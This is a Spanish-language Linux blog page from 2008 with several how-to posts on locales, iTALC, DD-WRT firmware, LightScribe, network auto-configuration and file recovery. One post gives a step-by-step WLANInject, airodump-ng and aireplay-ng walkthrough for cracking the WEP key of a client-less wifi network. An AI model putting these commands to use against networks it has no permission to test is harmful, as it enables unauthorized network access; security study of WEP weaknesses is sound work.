"Hablaré con el corazón abierto en palabra de voluntad
y
razón de sentimiento."
---Si quieres construir un barco, no empieces por buscar madera, cortar tablas o distribuir el trabajo. Evoca primero en los hombres y mujeres el anhelo del mar libre y ancho---

domingo, 4 de mayo de 2008

Cambair idioma GNOME

Suele pasar de ves en cuando que al actialisar gnome nos manda un error de perl nose que relacionado con las variables locales de lenguaje

pues la solucion a este rollo es realizar lo siguiente:

# apt-get install language-env

y
# dpkg-reconfigure locales

ahi aparesera una pantalla donde seleccionaremos el lenguaje que a nosotros nos convenga

saludos

sábado, 3 de mayo de 2008

iTALC: Sistema de control de aulas GPL

iTALC es una herramienta muy interesante, por ejemplo para control de aulas por parte del profesor, que permite ver y controlar ordenadores en una red de varias formas.

Soporta Linux y Windows 2000/XP/Vista. Además puede ser usado de forma transparente en entornos mixtos.

iTALC es GPL. Lo que significa que además de ser gratuito, el código fuente está disponible para que podamos adaptarlo a nuestras necesidades.

Características:

iTALC ha sido diseñado para ser usado en escuelas. Además, ofrece muchas posibilidades a los profesores, como por ejemplo:

  • Ver qué se está haciendo en laboratorios de ordenadores y creando instantáneas.
  • Control remoto de ordenadores para dar soporte y ayuda a alguien.
  • Mostrar una demo en pantalla completa o en una ventana. La pantalla del profesor se muestra a todos los ordenadores de los estudiantes en tiempo real.
  • Bloquear estaciones de trabajo para no permitir el uso de los ordenadores en determinados momentos que se deba atraer la atención del profesor.
  • Enviar mensajes de texto a los estudiantes.
  • Encendido, apagado y reinicio remoto de ordenadores.
  • Conexión remota a equipos, así como ejecución remota de comandos/scripts.
  • home-schooling - La tecnología de red de iTALC no está restringida a una subred, y los estudiantes pueden unirse a clases via conexión VPN, instalando un cliente iTALC.
Además, iTALC está optimizado para ser usado en sistemas multinúcleo, sin que haya que preocuparse de cuántos núcleos tiene el usuario. iTALC hace uso de todos ellos.

Por defecto, el interfaz de usuario de iTALC está en inglés. No obstante, cuando iTALC se inicia, comprueba el idioma del entorno e intenta cargar la localización apropiada, para que el usuario pueda ver la aplicación en su propio idioma.

Si alguien se anima a colaborar en el proceso de localización de esta aplicación, el proceso está descrito en:

http://italc.sourceforge.net/wiki/index.php?title=Creating_a_localization.

Además, hay una lista de desarrollo:

http://italc.sourceforge.net/mailinglists.php

Para más información, recomiendo visitar la web del proyecto:

http://italc.sourceforge.net/

WLANInject: Una herramienta para inyección de tráfico en una red wifi sin clientes

En redes wifi hay dos tipos de ataques:

  • Ataques pasivos. Mediante este tipo de ataques nos limitamos a capturar tráfico de la red víctima.
  • Ataques activos. Utilizamos técnicas de inyección de tráfico para generar el tráfico que necesitamos.

El problema mas común que nos encontramos en el ataque a una red WiFi con clave WEP es que no haya clientes en ella, con lo que al no haber tráfico podemos tardar muchos días en capturar el tráfico necesario para descubrir la clave WEP.

WLANInject es una impresionante utilidad para Linux que genera un paquete ARP en una red sin clientes a partir de la suposición de su rango de IP. Una vez generado el paquete, podemos usarlo para inyectar tráfico con aireplay.

El único inconveniente es que tenemos que tener:

  • Dos tarjetas de red: Una en modo managed para inyectar tráfico y otra en modo monitor para capturar tráfico.
  • O bien dos máquinas, una que capture tráfico y otra que lo inyecte.
  • O si tenemos un chipset atheros, podemos clonar la interface y crear una para inyectar y otra para capturar.
COMO INSTALAR WLANINYECT (sacado de www.makeandinstall.com)

Vamos a explicar como hacerlo sobre Ubuntu 7.04 :

  • Primero descargamos Wlaninject 0.6
  • Descomprimimos Wlaninject escribiendo en consola y en el directorio donde está el archivo comprimido:
tar -zxvf wlaninject-0.6.tar.gz
  • Instalamos dependencias necesarias para la compilación, para lo que ejecutamos en consola:
sudo apt-get build-dep aircrack-ng
sudo apt-get install -y libnet0 libnet1 libnet1-dev libpcap0.7 libpcap0.7-dev libpcap0.8 aircrack-ng
  • Entramos en la carpeta que acabamos de descomprimir y compilamos e instalamos el programa:

cd wlaninject-0.6
make
sudo make install

COMO USAR WLANINYECT (sacado de www.makeandinstall.com)

  • Lo primero es unirnos a la red encriptada que queremos atacar con la primera tarjeta de red WiFi, para lo que tendremos que suponer el rango de IP que usa (esto es de vital importancia, ya que si no acertamos el ataque no valdrá de nada). Los rangos más comunes son 192.168.1.X y 192.168.0.X (tambien podemos mirar que rango usa por defecto el router que estamos atacando). Por lo tanto vamos a unirnos a la red suponiendo que tiene un rango 192.168.1.X y que nuestra interface es ath0, para lo que escribimos:

sudo iwconfig ath0 channel CANAL

sudo iwconfig ath0 essid NOMBREDELARED

sudo iwconfig ath0 ap MAC_DEL_PUNTO_DE_ACCESO
sudo iwconfig ath0 key s:AAAAAAAAAAAAA

sudo ifconfig ath0 192.168.1.250 up

  • El siguiente proceso es variable dependiendo de si tenemos buena señal o mala, para saber los rates disponibles a los que podemos conectar (las velocidades de transmision) escribimos el siguiente código:

iwlist ath0 rate

  • Suponiendo que nos ha devuelto un rate bajo, como 1M, vamos a obligar a que la conexion se efectúe a ese rate, escribiendo:

sudo iwconfig ath0 rate 1M

  • Ahora, y antes de utilizar WlanInyect, ponemos a capturar paquetes a Airodump-ng y ponemos Aireplay-ng a la escucha del paquete ARP que se va a generar para que lo inyecte, para lo que escribimos:

sudo airodump-ng -c CANAL -w ARCHIVOGUARDAIV ath1

sudo aireplay-ng -4 -b MACDELPUNTODEACCESO -f1 ath1

  • Ponemos a trabajar a WlanInject:

wlaninject -e NOMBREDELARED -b MACDELPUNTODEACCESO -i ath0

En el ejemplo, hemos usado:

  • wlaninject con la interface ath0 (la que hemos puesto en modo managed)
  • Y aireplay-ng con la interface ath1 (la que hemos puesto en modo monitor)

Recordemos que también podríamos usar dos máquinas. Una es la que inyecta tráfico (en la que pondríamos la interfaz de red en modo managed) y la otra es la que captura tráfico (pondríamos su interfaz de red en modo monitor).

Ahora solo nos queda esperar a que Aireplay detecte el paquete ARP generado y pulsar Y para que lo inyecte, La orden que debemos ejecutar para que aireplay se ponga a la escucha es:

sudo aireplay-ng -4 -b MACDELPUNTODEACCESO -f1 ath1

Preparar nuestro propio router wifi

Existen multitud de dispositivos hardware que llevan una versión embebida de Linux, como por
ejemplo, el punto de acceso Linksys WRT54GL.

Y existen en la comunidad de usuarios de software libre varios proyectos que se encargan de modificar y mejorar el kernel de los puntos de acceso. Los más destacados son DD-WRT, OpenWRT, FreeWRT y Tomato. Y de entre ellos, por lo que he leído, el más utilizado y el que ofrece mayor funcionalidad ahora mismo es DD-WRT.

Estos proyectos, al incorporar linux como firmware del dispositivo, nos permiten ampliar de una manera impresionante la funcionalidad de nuestro punto de acceso, permitiéndonos convertirlo en un router con servicios como:

  • IPv6.
  • Cliente pptp. Que permite establecer conexiones VPN con servidores VPN.
  • Servidor pptpd. Que permite atender peticiones de clientes VPN.
  • NoCAT. Permite controlar el acceso de usuarios a la red mediante usuario/password.
  • OpenVPN. Que permite crear una red VPN entre varios puntos de acceso.
  • QoS. Que permite establecer prioridades para los diferentes tipos de tráfico.
  • RADIUS. Sistema de autentificación para acceso a la red.
  • RFlow. Que permite analizar el tráfico de la red.
  • SSH. Para acceso seguro a máquinas remotas.
  • SNMP. Para controlar el estado de los dispositivos de nuestra red.
  • Soporte HTTPS. Para administración web.
  • UPnP. Permite publicar servidores internos.
  • WOL. Permite el arranque remoto.
Es decir, que por muy poco dinero, podemos tener un potente router con servicios que sólo encontramos en equipos de gama alta.
Para poder actualizar el firmware de nuestro equipo tan sólo tenemos que descargarlo
de la página del proyecto que más nos interese y actualizar nuestro punto de acceso con él.

Las direcciones web de los diferentes proyectos son:
Allí podremos encontrar, además del firmware y documentación, una lista de dispositivos compatibles con dicho firmware.

lightscribe en linux

Hoy en día casi todas las regrabadoras de dvd incorporan lightscribe, una tecnología que permite grabar la superficie de los discos de forma que ya no tendremos que usar etiquetas de papel. Eso sí, para que podamos hacer la carátula del disco, éste también debe ser lightscribe. No vale con que lo sea la grabadora.

Una cosa a tener en cuenta al utilizar un disco lightscribe es que primero grabaremos el contenido del disco y después, daremos la vuelta al disco para imprimir la carátula.

De la siguiente página podemos descargar el controlador y una aplicación gráfica para crear la portada del disco:

http://www.lacie.com/es/support/drivers/index.htm?id=10008

El enlace directo al controlador para linux es el siguiente:
http://www.lacie.com/es/support/drivers/driver.htm?id=10095

El enlace directo al software para crear las etiquetas en linux es el siguiente:
http://www.lacie.com/es/support/drivers/driver.htm?id=10094

Los paquetes Linux están disponibles en formato rpm, así que tendremos que descargarlos y convertirlos a formato deb con la herramienta alien.

# alien --scripts lightscribe-1.8.15.1-linux-2.6-intel.rpm
# alien --scripts 4L-1.0-r6.i586.rpm

Una vez ejecutados los dos comandos anteriores ya tendremos los paquetes convertidos a formato deb:

  • lightscribe-1.8.15.1-linux-2.6-intel.deb
  • 4L-1.0-r6.i586.deb
Ahora, ya podemos instalarlos:

# dpkg -i lightscribe-1.8.15.1-linux-2.6-intel.deb
# dpkg -i 4L-1.0-r6.i586.deb

Una vez instalados, podremos crear las carátulas de los discos ejecutando:

$ 4L-gui

Mobile Media Converter

Mobile Media Converter es una aplicación muy interesante para convertir video y audio para reproductores MP3, MP4 y teléfonos móviles. Usa ffmpeg para convertir ficheros de audio MP3 / WAV / WMA a formato AMR (Adaptive Multi-Rate Codec, *.amr) y viceversa (AMR to MP3).

Además, puede convertir videos WMV (excepto WMV ver.9) y videos MPEG a 3GP y viceversa (MPEG a 3GP).

Existe una versión para windows y otra para linux.

El programa es muy sencillo de usar y permite seleccionar ficheros arrastrándolos a la aplicación.

Si queréis descargar la versión de linux, podéis hacerlo desde el siguiente enlace:

http://www.miksoft.net/products/mmc-lin.tar.gz

En cuanto a la versión de windows, podéis descargarla desde aquí:

http://www.miksoft.net/products/MMCsetup.exe

Mobile Media Converter

Mobile Media Converter es una aplicación muy interesante para convertir video y audio para reproductores MP3, MP4 y teléfonos móviles. Usa ffmpeg para convertir ficheros de audio MP3 / WAV / WMA a formato AMR (Adaptive Multi-Rate Codec, *.amr) y viceversa (AMR to MP3).

Además, puede convertir videos WMV (excepto WMV ver.9) y videos MPEG a 3GP y viceversa (MPEG a 3GP).

Existe una versión para windows y otra para linux.

El programa es muy sencillo de usar y permite seleccionar ficheros arrastrándolos a la aplicación.

Si queréis descargar la versión de linux, podéis hacerlo desde el siguiente enlace:

http://www.miksoft.net/products/mmc-lin.tar.gz

En cuanto a la versión de windows, podéis descargarla desde aquí:

http://www.miksoft.net/products/MMCsetup.exe

Conexión automática a la red del trabajo o a la red de casa con linux

Habitualmente utilizo en portátil tanto en casa como en el trabajo, y una de las cosas que siempre me han resultado pesadas ha sido cambiar la configuración de la red cada vez que voy a usar el ordenador en casa y volverla a cambiar para usarlo en el trabajo.

Así que un día que estaba bastante harto de hacer cambios diarios, me puse a configurar el portátil para que se conectara automáticamente a la red de casa o a la del trabajo dependiendo de donde lo conectara.

En casa me conecto por wifi a la red que tiene seguridad wep y en el trabajo por ethernet, así que necesité instalar:

  • ifplugd : monitorea si se establece link en la capa física (por ejemplo si un cable de red es conectado o si existe una asociación wireless activa).
  • guessnet : nos da herramientas para detectar a qué red estamos conectados.

¿Cómo instalarlas? Nada más fácil:

aptitude install ifplugd guessnet

Si tenéis vuestro punto de acceso con seguridad wpa tendréis que instalar también wpagui, que maneja la asociación wireless con un punto de acceso.

Una vez instalados los paquetes, modificamos el fichero /etc/network/interfaces. El mío quedó de la siguiente manera:

# /etc/network/interfaces

auto lo

iface lo inet loopback
address 127.0.0.1
netmask 255.0.0.0

iface ppp0 inet ppp
provider ppp0

mapping eth?
script guessnet-ifupdown
#map default: trabajo
map timeout: 3
#map verbose: true

iface trabajo inet static
address 192.168.1.2
netmask 255.255.255.0
broadcast 192.168.1.255
gateway 192.168.1.1

iface casa inet dhcp
test wireless essid C54APRA

# Si ninguna es encontrada, prueba DHCP
iface none inet dhcp


Veamos paso a paso en fichero de configuración:

auto lo

iface lo inet loopback
address 127.0.0.1
netmask 255.0.0.0

Las lineas anteriores definen el localhost y lo levantan automáticamente en el inicio.

iface ppp0 inet ppp
provider ppp0

Las dos líneas anteriores definen el interfaz del modem, por si en algún momento decido usarlo.

mapping eth?
script guessnet-ifupdown
map timeout: 3

Las líneas anteriores definen que las interfaces eth? como por ejemplo eth0, eth1 ... van a ser manejadas automáticamente.

iface trabajo inet static
address 192.168.1.2
netmask 255.255.255.0
broadcast 192.168.1.255
gateway 192.168.1.1

test peer address 192.168.1.1 mac 02:E0:52:EB:B6:DF

Las líneas anteriores definen que la conexión al trabajo se hace con ip estática. Y que, por decirlo de alguna manera, para determinar que nos estamos conectando a la red del trabajo comprobamos que hay un host (por ejemplo el router) con una IP y una MAC concreta.

iface casa inet dhcp
test wireless essid MICASA

Las dos líneas anteriores determinan que la conexión a la red de casa se hace mediante dhcp y para comprobar que se debe conectar a la red de casa, testeamos que existe una red con wifi con el nombre MICASA.

# Si ninguna es encontrada, prueba DHCP
iface none inet dhcp

Y, por último, las dos líneas anteriores nos sirven para que, si no encontramos la red de casa, ni la del trabajo, se pruebe a conectar por dhcp.

Recuperar datos borrados en linux: recoverjpg, magicrescue y foremost

Para la recuperación de archivos, existen para Linux muchas opciones, como por ejemplo:

  • testdisk - Escaner de particiones y herramienta de recuperación. Compatible con todas las particiones. GPL.
  • magicrescue - Recuperación de "bytes mágicos". GPL.
  • e2undel - sólo en ext2. GPL.
  • recover - Sólo particiones ext2. GPL.
  • recoverjpg - sólo para archivos jpg/jpeg. GPL.
  • foremost - Recuperación 'forense' de archivos en disco y unidades externas (cámaras...). GPL.
  • sleuthkit - DOS, BSD, Mac & Sun partitions. IBM+GPL.
  • gddrescue - Usa posibles backups del archivo para evitar errores. GPL.
Veamos dos de estas herramientas para recuperar datos borrados en linux: magicrescue y foremost. Ambas se encuentran habitualmente en los repositorios, así que, para instalarlas no tenemos más que hacer:

# apt-get install magicrescue foremost

* magicrescue.
Esta herramienta recupera una amplia gama de archivos: avi, mp3, gimp-xcf, jpg, png, doc, odt, etc...
Por cada tipo de archivo soportado tiene un archivo con receta ubicado en el catálogo /usr/local/share/magicrescue/recipes.

root@adminies:/home/miusuario# ls /usr/share/magicrescue/recipes/
avi gimp-xcf gzip jpeg-jfif mp3-id3v2 perl zip
elf gpl jpeg-exif mp3-id3v1 msoffice png

Para recuperar un archivo .zip, por ejemplo, ejecutariamos la siguiente instrucción:

# magicrescue -d /opt/tmp/ -r /usr/share/magicrescue/recipes/zip /dev/hda3

- Con la opción -d definimos el catálogo de destino de recuperación.
- Con la opción -r le decimos el recipiente que debe buscar. Por ejemplo: .zip .jpg
- El último argumento es el sitio a escanear.

* foremost.
Es un programa similar al anterior.
Podemos ver los tipos de archivos soportados haciendo un man, aunque también podemos verlo en el archivo de configuración /etc/foremost.conf.

Veamos un ejemplo para recuperar un archivo doc borrado:

# foremost -t doc -o /tmp/recuperado -i /home/usuario/apuntes

- Con la opción -t indicamos el tipo de archivo a buscar.
- Con la opcion -o indicamos el lugar donde almacenar los archivos recuperados.
- Con la opción -i indicamos el lugar a escanear